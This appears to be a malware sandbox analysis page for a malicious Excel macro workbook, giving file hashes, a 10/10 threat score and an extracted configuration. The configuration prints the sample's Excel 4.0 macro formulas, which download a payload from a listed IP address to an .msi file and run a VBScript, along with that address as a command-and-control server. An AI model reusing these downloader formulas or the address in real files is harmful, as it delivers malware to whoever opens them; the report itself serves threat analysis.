Overview

overview

10

Static

static

10

70dd50aac5...a.xlsm

windows7-x64

10

70dd50aac5...a.xlsm

windows10-2004-x64

1

Sharing

Copy URL
Twitter E-mail

General

  • Target

    70dd50aac51e46c2309adf4092561d8a

  • Size

    6KB

  • MD5

    70dd50aac51e46c2309adf4092561d8a

  • SHA1

    666e776ab713d6f42b8bd7f017eb44219cfde333

  • SHA256

    cb097eb6ad7386061dd5ffea6122c6dc49e0ffd82352ea5425dda62f65ab4447

  • SHA512

    e6f1276ad28446afb6a3967d27d4c20b5ab0fb940e3585a68b94246840ee4b9b03dc501b0269449b474569d38814ce9726ec87820067d12a224f4793477e0562

  • SSDEEP

    192:NDSGuS0brA2OmmfRH8UhHFBFYuZb98yMKTt+SzvRZi:NxuxM2wd1FYEb98yMgZi

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php
Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

  • 70dd50aac51e46c2309adf4092561d8a
    .xlsm office2007